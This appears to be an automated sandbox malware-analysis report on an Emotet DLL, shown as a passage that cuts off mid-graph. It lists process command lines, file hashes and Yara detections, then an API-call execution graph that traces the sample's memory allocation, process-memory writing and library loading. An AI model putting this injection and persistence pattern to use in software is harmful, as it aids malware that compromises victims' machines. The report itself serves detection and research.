                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712289758.0000000004711000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712514212.00000000048B1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712664698.0000000004911000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712162779.0000000004631000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712727948.0000000004A40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711795712.0000000004040000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711701070.0000000003FC1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712440145.0000000004880000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712583531.00000000048E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712769808.0000000004A71000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711647577.0000000003F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 6860 Parent PID: 6796

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.710385050.00000000030A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 6880 Parent PID: 6860

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 4928 Parent PID: 6792

                                                                                                      General

                                                                                                      Start time:16:11:55
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.714978387.00000000041A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 3476 Parent PID: 4928

                                                                                                      General

                                                                                                      Start time:16:11:56
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232447127.0000000005810000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232307431.0000000005601000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1231756136.00000000034D1000.00000020.00000010.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232722292.0000000005AC1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232778778.0000000005BA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232026757.0000000004EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232814811.0000000005BD1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232471736.0000000005841000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232588764.0000000005970000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232613063.00000000059A1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232537029.00000000058B1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232513916.0000000005880000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232107048.0000000004F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232396043.00000000056E1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232361987.00000000056B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 4864 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:16:12:16
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6940 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:16:12:32
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6904 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:16:12:43
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >

                                                                                                        Analysis Process: rundll32.exe PID: 6792 Parent PID: 6816 rundll32.exeCOMMON

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:11.9%
                                                                                                        Total number of Nodes:529
                                                                                                        Total number of Limit Nodes:13

                                                                                                        Graph

                                                                                                        execution_graph 21236 10032803 117 API calls ___init_ctype 21237 10037201 PeekMessageA GetCurrentThreadId PostThreadMessageA 21239 10019002 116 API calls 21240 1001be02 113 API calls 2 library calls 21242 10038c09 217 API calls 21243 1002040e 118 API calls 21244 10031c0e 123 API calls ~_Task_impl 21245 1002e80d SetViewportOrgEx 21246 10008c10 SetWindowExtEx SetWindowExtEx 21247 10007610 192 API calls ~_Task_impl 21248 1001b210 GetWindowLongA GetParent IsZoomed GetSystemMetrics GetSystemMetrics 21251 1001d212 114 API calls 21252 10008a14 TabbedTextOutA 21253 10034417 14 API calls 21254 10020c18 126 API calls 2 library calls 21255 10011a1a GetObjectA DeleteObject LocalAlloc RaiseException 21256 1003521e 120 API calls ~_Task_impl 21257 1003261e LocalAlloc ClientToScreen PtInRect RaiseException ~_Task_impl 21259 10012c1f 141 API calls 21260 10004820 169 API calls 21261 10047c26 94 API calls 3 library calls 21262 1001cc22 146 API calls 5 library calls 21263 10016427 125 API calls 21264 10023a2a MulDiv 21266 10009e29 116 API calls ~_Task_impl 21267 10024232 147 API calls 21268 10026a32 11 API calls 21269 10034e33 101 API calls ___init_ctype 21270 1002e833 OffsetViewportOrgEx 21271 1001d630 115 API calls 21272 1003f030 6 API calls 4 library calls 21274 1000c835 lstrcmpW 21275 1000ec37 108 API calls 21276 1001fc36 137 API calls 21277 1001723d 6 API calls ___init_ctype 21278 1002743f SysStringLen SysStringByteLen SysStringByteLen SysFreeString _memcmp 21279 1003343e 124 API calls 21281 1000be40 11 API calls 21282 10016843 121 API calls 21283 1002c246 7 API calls 21284 10016e44 149 API calls ~_Task_impl 21285 10015047 117 API calls 21286 1001e047 InterlockedIncrement 21287 10013049 131 API calls 21288 1001284b SetRectEmpty 21289 10008c4d ScaleWindowExtEx ScaleWindowExtEx 21291 1002c04d 107 API calls 21292 1001244e 15 API calls ___init_ctype 21293 10013e4e 126 API calls ~_Task_impl 21294 10005a50 176 API calls 2 library calls 21296 10016652 149 API calls 21297 10008254 SendMessageA 21298 10039a57 113 API calls 21299 10014454 118 API calls ~_Task_impl 21300 10046c52 106 API calls ___getlocaleinfo 21301 1001f458 8 API calls ~_Task_impl 21302 1002e859 SetViewportExtEx 21303 1001e05e 106 API calls ___init_ctype 21304 1000b063 70 API calls _memcpy_s 21305 10018e66 125 API calls ~_Task_impl 21306 10008a68 DrawTextExA 21307 10033268 132 API calls 21308 1002626e 165 API calls 21309 1003446f 14 API calls 21313 10024e6c 155 API calls 21314 1000ae74 77 API calls 21316 10016c7d SetBrushOrgEx 21318 1002e87f ScaleViewportExtEx 21319 1000e881 106 API calls ~_Task_impl 21320 10032282 6 API calls 21321 1002b080 84 API calls 21323 10034a86 149 API calls 3 library calls 21324 10008a87 GrayStringA 21325 10025a85 132 API calls 21326 1000ee8a 150 API calls 21327 1001908c 129 API calls ~_Task_impl 21328 1002988f 7 API calls ___init_ctype 21329 1000828e 133 API calls ___init_ctype 21330 1001c68f 119 API calls ~_Task_impl 21331 10001090 5 API calls 2 library calls 21332 10013a90 143 API calls 2 library calls 21333 10040296 71 API calls 3 library calls 21335 10023e91 121 API calls ~_Task_impl 21338 100342aa 19 API calls 21339 1002e6ab 8 API calls ~_Task_impl 21340 100472ae 108 API calls 5 library calls 21341 10017caa 171 API calls 21342 10011ab4 6 API calls 2 library calls 21202 1002a0b5 21204 1002a0c1 __EH_prolog3 21202->21204 21205 1002a10f 21204->21205 21213 10029dce EnterCriticalSection 21204->21213 21227 1000836f LocalAlloc RaiseException __EH_prolog3 __CxxThrowException@8 ~_Task_impl 21204->21227 21228 10029ede TlsAlloc InitializeCriticalSection 21204->21228 21229 10029c5b EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 21205->21229 21208 1002a11c 21210 1002a122 21208->21210 21211 1002a135 std::runtime_error::runtime_error 21208->21211 21230 10029f80 90 API calls 4 library calls 21210->21230 21219 10029ded 21213->21219 21214 10029ea9 _memset 21215 10029ebd LeaveCriticalSection 21214->21215 21215->21204 21216 10029e26 21231 10001fc0 21216->21231 21217 10029e3b GlobalHandle GlobalUnlock 21218 10001fc0 ~_Task_impl 82 API calls 21217->21218 21221 10029e58 GlobalReAlloc 21218->21221 21219->21214 21219->21216 21219->21217 21223 10029e62 21221->21223 21224 10029e8a GlobalLock 21223->21224 21225 10029e7b LeaveCriticalSection 21223->21225 21226 10029e6d GlobalHandle GlobalLock 21223->21226 21224->21214 21225->21224 21226->21225 21228->21204 21229->21208 21230->21211 21232 10001fcc 21231->21232 21233 10001fdb GlobalAlloc 21232->21233 21235 10001190 82 API calls ~_Task_impl 21232->21235 21233->21223 21344 1001eab9 120 API calls 21345 100324b8 14 API calls 21346 10032ebe GetScrollPos UpdateWindow 21347 100092c0 113 API calls 21348 1001e0c5 139 API calls 2 library calls 21349 1002f8c6 153 API calls 21350 10014ac5 130 API calls 21351 1002e8c7 9 API calls ~_Task_impl 21353 100142cb 136 API calls ~_Task_impl 21356 100388cf 222 API calls 21357 1001a6cd 125 API calls 21358 100174d3 LocalAlloc RaiseException 21359 1002c0d1 8 API calls 21360 10008ad3 SetViewportOrgEx SetViewportOrgEx 21361 100226db 73 API calls 21366 100018e0 132 API calls ~_Task_impl 21367 100348e3 85 API calls 3 library calls 21369 1002b6e2 7 API calls ___init_ctype 21370 1000dee1 112 API calls 21371 100270e6 134 API calls ___init_ctype 21373 100260eb 7 API calls 21376 10011eef 83 API calls 2 library calls 21377 100230ed 116 API calls 21378 10012aee 118 API calls ___init_ctype 21379 100128f1 114 API calls 21380 1003a2f3 75 API calls 4 library calls 21381 10021af3 SetBkColor ExtTextOutA 21382 100152f2 83 API calls 21383 10030af0 82 API calls 21384 100188f7 114 API calls 21385 100202fb 135 API calls ~_Task_impl 21386 1001c8fb 120 API calls ~_Task_impl 21388 10007efb 83 API calls ___crtsetenv 21389 100380fe 152 API calls 21392 10034702 121 API calls ~_Task_impl 20824 1003d301 20825 1003d308 20824->20825 20826 1003d30d 20824->20826 20842 10048edf GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 20825->20842 20830 1003d20b 20826->20830 20829 1003d31e 20831 1003d217 __calloc_impl 20830->20831 20832 1003d264 20831->20832 20836 1003d2b4 __calloc_impl 20831->20836 20843 1003d032 20831->20843 20832->20836 20897 10003360 20832->20897 20836->20829 20837 1003d032 __CRT_INIT@12 164 API calls 20837->20836 20838 10003360 ___DllMainCRTStartup 79 API calls 20839 1003d28b 20838->20839 20840 1003d032 __CRT_INIT@12 164 API calls 20839->20840 20841 1003d294 20840->20841 20841->20836 20841->20837 20842->20826 20844 1003d045 GetProcessHeap HeapAlloc 20843->20844 20845 1003d15c 20843->20845 20848 1003d069 GetVersionExA 20844->20848 20855 1003d062 20844->20855 20846 1003d162 20845->20846 20847 1003d197 20845->20847 20853 1003d181 20846->20853 20846->20855 21003 10040028 20846->21003 20851 1003d1f5 20847->20851 20852 1003d19c 20847->20852 20849 1003d084 GetProcessHeap HeapFree 20848->20849 20850 1003d079 GetProcessHeap HeapFree 20848->20850 20854 1003d0b0 20849->20854 20850->20855 20851->20855 21032 10045be3 81 API calls 2 library calls 20851->21032 21014 1004590c 7 API calls __decode_pointer 20852->21014 20853->20855 21012 10048860 70 API calls ___init_ctype 20853->21012 20917 100406d8 HeapCreate 20854->20917 20855->20832 20860 1003d1a1 21015 10041721 20860->21015 20862 1003d0e6 20862->20855 20927 10045c4c GetModuleHandleA 20862->20927 20865 1003d18b 21013 10045936 6 API calls __decode_pointer 20865->21013 20869 1003d0f4 __RTC_Initialize 20874 1003d107 GetCommandLineA 20869->20874 20888 1003d0f8 20869->20888 20960 10048bd8 20874->20960 20875 1003d1d2 21030 10045973 69 API calls 4 library calls 20875->21030 20876 1003d1e9 21031 10039f30 69 API calls 7 library calls 20876->21031 20881 1003d1d9 GetCurrentThreadId 20881->20855 20883 1003d121 20884 1003d125 20883->20884 20885 1003d12c 20883->20885 21007 10045936 6 API calls __decode_pointer 20884->21007 21008 10048b1f 113 API calls 3 library calls 20885->21008 21006 10040732 VirtualFree HeapFree HeapFree HeapDestroy 20888->21006 20889 1003d131 20890 1003d145 20889->20890 21009 100488ac 112 API calls 6 library calls 20889->21009 20896 1003d14a 20890->20896 21011 10048860 70 API calls ___init_ctype 20890->21011 20893 1003d13a 20893->20890 21010 1003feb7 76 API calls 3 library calls 20893->21010 20894 1003d15a 20894->20884 20896->20855 21094 10003b20 20897->21094 20899 100033be 20900 10003b20 ___DllMainCRTStartup 70 API calls 20899->20900 20901 100033e1 20900->20901 21106 10003e70 20901->21106 20903 100033fd LoadLibraryA 20904 10003417 MessageBoxA ExitProcess 20903->20904 20905 10003430 ___DllMainCRTStartup 20903->20905 20906 10003574 VirtualAllocExNuma 20905->20906 20907 10003588 20905->20907 20908 10003597 WriteProcessMemory 20906->20908 20907->20908 21113 1003a230 20908->21113 20910 100035b7 21132 10002d70 20910->21132 20912 100035bf ___DllMainCRTStartup 21135 100028f0 20912->21135 20914 100035d0 ___DllMainCRTStartup 21145 10039f21 20914->21145 20916 10003670 20916->20838 20916->20841 20918 100406f8 20917->20918 20919 100406fb 20917->20919 20918->20862 21033 1004067d 69 API calls 3 library calls 20919->21033 20921 10040700 20922 1004072e 20921->20922 20923 1004070a 20921->20923 20922->20862 21034 1004094d HeapAlloc 20923->21034 20925 10040714 20925->20922 20926 10040719 HeapDestroy 20925->20926 20926->20918 20928 10045c67 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 20927->20928 20929 10045c5e 20927->20929 20933 10045cb1 TlsAlloc 20928->20933 21035 10045936 6 API calls __decode_pointer 20929->21035 20934 10045cff TlsSetValue 20933->20934 20935 10045dcb 20933->20935 20934->20935 20936 10045d10 20934->20936 20935->20869 21036 10040037 5 API calls 3 library calls 20936->21036 20938 10045d15 21037 10045834 TlsGetValue 20938->21037 20941 10045834 __encode_pointer 5 API calls 20942 10045d30 20941->20942 20943 10045834 __encode_pointer 5 API calls 20942->20943 20944 10045d40 20943->20944 20945 10045834 __encode_pointer 5 API calls 20944->20945 20946 10045d50 20945->20946 21046 100407a6 69 API calls ___crtInitCritSecAndSpinCount 20946->21046 20948 10045d5d 20949 10045dc6 20948->20949 20951 100458a0 __decode_pointer 5 API calls 20948->20951 21048 10045936 6 API calls __decode_pointer 20949->21048 20952 10045d71 20951->20952 20952->20949 20953 10041721 __calloc_crt 69 API calls 20952->20953 20954 10045d8a 20953->20954 20954->20949 20955 100458a0 __decode_pointer 5 API calls 20954->20955 20956 10045da4 20955->20956 20956->20949 20957 10045dab 20956->20957 21047 10045973 69 API calls 4 library calls 20957->21047 20959 10045db3 GetCurrentThreadId 20959->20935 20961 10048bf4 GetEnvironmentStringsW 20960->20961 20962 10048c13 20960->20962 20963 10048bfc 20961->20963 20964 10048c08 GetLastError 20961->20964 20962->20963 20965 10048cae 20962->20965 20967 10048c3d WideCharToMultiByte 20963->20967 20968 10048c2e GetEnvironmentStringsW 20963->20968 20964->20962 20966 10048cb6 GetEnvironmentStrings 20965->20966 20969 1003d117 20965->20969 20966->20969 20970 10048cc6 20966->20970 20973 10048c71 20967->20973 20974 10048ca3 FreeEnvironmentStringsW 20967->20974 20968->20967 20968->20969 20986 10048620 20969->20986 21051 100416e1 69 API calls _malloc 20970->21051 21049 100416e1 69 API calls _malloc 20973->21049 20974->20969 20977 10048cdf 20979 10048ce6 FreeEnvironmentStringsA 20977->20979 20980 10048cf2 ___init_ctype 20977->20980 20978 10048c77 20978->20974 20981 10048c80 WideCharToMultiByte 20978->20981 20979->20969 20984 10048cfa FreeEnvironmentStringsA 20980->20984 20982 10048c91 20981->20982 20983 10048c9a 20981->20983 21050 10039f30 69 API calls 7 library calls 20982->21050 20983->20974 20984->20969 21052 1003f350 20986->21052 20988 1004862c GetStartupInfoA 20989 10041721 __calloc_crt 69 API calls 20988->20989 20995 1004864d 20989->20995 20990 10048857 __calloc_impl 20990->20883 20991 100487d4 GetStdHandle 20997 1004879e 20991->20997 20992 10041721 __calloc_crt 69 API calls 20992->20995 20993 10048839 SetHandleCount 20993->20990 20994 100487e6 GetFileType 20994->20997 20995->20990 20995->20992 20996 10048721 20995->20996 20995->20997 20996->20997 20999 10048755 20996->20999 21000 1004874a GetFileType 20996->21000 20997->20991 20997->20993 20997->20994 20998 100487fd 20997->20998 20998->20990 20998->20997 21054 1004aa03 69 API calls 5 library calls 20998->21054 20999->20990 20999->20996 21053 1004aa03 69 API calls 5 library calls 20999->21053 21000->20996 21000->20999 21055 1003ff49 21003->21055 21005 10040033 21005->20853 21006->20855 21008->20889 21009->20893 21010->20890 21011->20894 21012->20865 21014->20860 21018 10041725 21015->21018 21017 1003d1ad 21017->20855 21021 100458a0 TlsGetValue 21017->21021 21018->21017 21019 10041745 Sleep 21018->21019 21075 10039fbe 21018->21075 21020 1004175a 21019->21020 21020->21017 21020->21018 21022 100458d4 GetModuleHandleA 21021->21022 21023 100458b3 21021->21023 21025 100458e3 GetProcAddress 21022->21025 21026 1003d1cb 21022->21026 21023->21022 21024 100458bd TlsGetValue 21023->21024 21028 100458c8 21024->21028 21027 100458cc 21025->21027 21026->20875 21026->20876 21027->21026 21029 100458f3 RtlDecodePointer 21027->21029 21028->21022 21028->21027 21029->21026 21030->20881 21031->20855 21032->20855 21033->20921 21034->20925 21036->20938 21038 10045847 21037->21038 21039 10045868 GetModuleHandleA 21037->21039 21038->21039 21040 10045851 TlsGetValue 21038->21040 21041 10045877 GetProcAddress 21039->21041 21042 10045891 21039->21042 21043 1004585c 21040->21043 21045 10045860 21041->21045 21042->20941 21043->21039 21043->21045 21044 10045887 RtlEncodePointer 21044->21042 21045->21042 21045->21044 21046->20948 21047->20959 21049->20978 21050->20983 21051->20977 21052->20988 21053->20999 21054->20998 21056 1003ff55 __calloc_impl 21055->21056 21071 1004091c 69 API calls 2 library calls 21056->21071 21058 1003ff5c 21059 1003ff98 _doexit 21058->21059 21061 100458a0 __decode_pointer 5 API calls 21058->21061 21072 10040002 LeaveCriticalSection _doexit 21059->21072 21063 1003ff8b 21061->21063 21062 1003ffe3 21064 1003ffe9 21062->21064 21068 10040011 __calloc_impl 21062->21068 21065 100458a0 __decode_pointer 5 API calls 21063->21065 21073 10040844 LeaveCriticalSection 21064->21073 21065->21059 21067 1003fff6 21074 1003fde5 GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 21067->21074 21068->21005 21071->21058 21072->21062 21073->21067 21076 10039fca __calloc_impl 21075->21076 21077 10039fe2 21076->21077 21087 1003a001 _memset 21076->21087 21088 1003f256 69 API calls __getptd_noexit 21077->21088 21079 10039fe7 21089 1004157e 5 API calls 2 library calls 21079->21089 21081 1003a073 RtlAllocateHeap 21081->21087 21082 10039ff7 __calloc_impl 21082->21018 21087->21081 21087->21082 21090 1004091c 69 API calls 2 library calls 21087->21090 21091 10041169 5 API calls 2 library calls 21087->21091 21092 1003a0ba LeaveCriticalSection _doexit 21087->21092 21093 10041456 5 API calls __decode_pointer 21087->21093 21088->21079 21090->21087 21091->21087 21092->21087 21093->21087 21096 10003b30 21094->21096 21095 10003b6f 21097 10003b7e 21095->21097 21169 10052b3c 70 API calls 4 library calls 21095->21169 21096->21095 21100 10003b52 21096->21100 21101 10003b91 21097->21101 21170 10003c80 70 API calls 6 library calls 21097->21170 21153 100039f0 21100->21153 21105 10003ba5 21101->21105 21171 1003a7f6 69 API calls 3 library calls 21101->21171 21103 10003b69 21103->20899 21105->20899 21107 100039f0 std::runtime_error::runtime_error 70 API calls 21106->21107 21108 10003ec1 21107->21108 21178 10003f50 21108->21178 21111 100039f0 std::runtime_error::runtime_error 70 API calls 21112 10003eef ___DllMainCRTStartup 21111->21112 21112->20903 21114 1003a2dd 21113->21114 21125 1003a23e 21113->21125 21199 10041456 5 API calls __decode_pointer 21114->21199 21116 1003a2e3 21200 1003f256 69 API calls __getptd_noexit 21116->21200 21119 1003a2e9 21119->20910 21122 1003a2a1 RtlAllocateHeap 21122->21125 21123 1003a253 21123->21125 21192 100419a4 69 API calls __NMSG_WRITE 21123->21192 21193 10041804 69 API calls 7 library calls 21123->21193 21194 1003fde5 GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 21123->21194 21125->21122 21125->21123 21126 1003a2d4 21125->21126 21127 1003a2c8 21125->21127 21130 1003a2c6 21125->21130 21195 1003a1e1 69 API calls 4 library calls 21125->21195 21196 10041456 5 API calls __decode_pointer 21125->21196 21126->20910 21197 1003f256 69 API calls __getptd_noexit 21127->21197 21198 1003f256 69 API calls __getptd_noexit 21130->21198 21133 1003a230 _malloc 69 API calls 21132->21133 21134 10002d89 21133->21134 21134->20912 21134->21134 21139 10002911 ___DllMainCRTStartup 21135->21139 21136 10002977 21136->20914 21137 100029d7 GetNativeSystemInfo 21137->21136 21138 10002a00 VirtualAlloc 21137->21138 21141 10002a1d 21138->21141 21139->21136 21139->21137 21140 10002a92 LoadLibraryA 21140->21141 21141->21140 21141->21141 21143 10002b02 21141->21143 21142 10002c88 21142->20914 21143->21142 21144 10002c5a VirtualProtect 21143->21144 21144->21136 21144->21143 21146 10039f2b IsDebuggerPresent 21145->21146 21147 10039f29 21145->21147 21201 1004b88d 21146->21201 21147->20916 21150 10040644 SetUnhandledExceptionFilter UnhandledExceptionFilter 21151 10040661 __invoke_watson 21150->21151 21152 10040669 GetCurrentProcess TerminateProcess 21150->21152 21151->21152 21152->20916 21154 10003a03 21153->21154 21155 10003a08 21153->21155 21172 10052bcd 70 API calls 4 library calls 21154->21172 21157 10003a3a 21155->21157 21158 10003a1b 21155->21158 21162 10003a44 21157->21162 21175 10052b3c 70 API calls 4 library calls 21157->21175 21173 10003bf0 70 API calls 2 library calls 21158->21173 21160 10003a27 21174 10003bf0 70 API calls 2 library calls 21160->21174 21166 10003a57 21162->21166 21176 10003c80 70 API calls 6 library calls 21162->21176 21165 10003a31 21165->21103 21168 10003a6a 21166->21168 21177 1003a7f6 69 API calls 3 library calls 21166->21177 21168->21103 21170->21101 21171->21105 21172->21155 21173->21160 21174->21165 21176->21166 21177->21168 21179 10003f61 21178->21179 21180 10003f7b 21179->21180 21188 10052b3c 70 API calls 4 library calls 21179->21188 21182 10003f93 21180->21182 21187 10003ed7 21180->21187 21189 10052b3c 70 API calls 